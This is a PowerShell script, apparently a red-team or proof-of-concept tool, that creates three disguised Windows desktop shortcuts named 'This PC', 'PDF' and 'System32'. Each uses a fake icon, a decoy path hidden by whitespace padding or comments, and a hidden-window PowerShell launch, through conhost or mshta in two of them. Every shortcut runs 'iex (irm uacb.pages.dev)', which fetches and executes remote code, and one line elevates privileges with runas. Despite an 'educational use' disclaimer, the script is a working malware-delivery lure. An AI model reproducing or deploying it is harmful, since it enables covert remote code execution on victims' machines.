# --- Author: zetod1ce (github.com/ztd38f) --- # # --- DISCLAIMER: Provided as-is, without warranties. For educational and testing use only in controlled environments. Use at your own risk. --- # # if (!(Test-Path "$env:SystemRoot\System32\vbscript.dll")) {start -v runas "cmd" "/k DISM /Online /Add-Capability /CapabilityName:VBSCRIPT~~~~"} # [PS Shortcut Attack] function pc { $shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:userprofile\Desktop\This PC.lnk") $shortcut.TargetPath = '%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe' $shortcut.Arguments = '-win h -nop' + '<#' + (' '*121) + 'C:\Program Files (x86)\Microsoft\Windows\System32\explorer.exe#> calc.exe; iex (irm uacb.pages.dev)' $shortcut.Description = "$env:computername" $shortcut.IconLocation = "shell32.dll,15" $shortcut.WindowStyle = "7" $shortcut.Save() }; pc # [CONHOST Shortcut Attack] function pdf { $shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:userprofile\Desktop\PDF.lnk") $shortcut.TargetPath = '%SystemRoot%\System32\conhost.exe' $shortcut.Arguments = '--headless %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -win h -nop calc.exe; iex (irm uacb.pages.dev); # %SystemRoot%\System32\Microsoft.AspNetCore.SecretLicense.pdf' $shortcut.Description = "PDF" $shortcut.IconLocation = "%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe,11" $shortcut.WindowStyle = "7" $shortcut.Save() }; pdf # [MSHTA Shortcut Attack] function system32 { $shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:userprofile\Desktop\System32.lnk") $shortcut.TargetPath = '%SystemRoot%\System32\mshta.exe' $shortcut.Arguments = 'vbscript:("' + 'C:\Program Files (x86)\Microsoft\Windows\System32\explorer.exe")(createobject("wscript.shell").run("%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -win n -nop -c calc.exe; iex (irm uacb.pages.dev)",1,1)(window.close))' $shortcut.Description = "C:\Windows\System32" $shortcut.IconLocation = "shell32.dll,3" $shortcut.WindowStyle = "7" $shortcut.Save() }; system32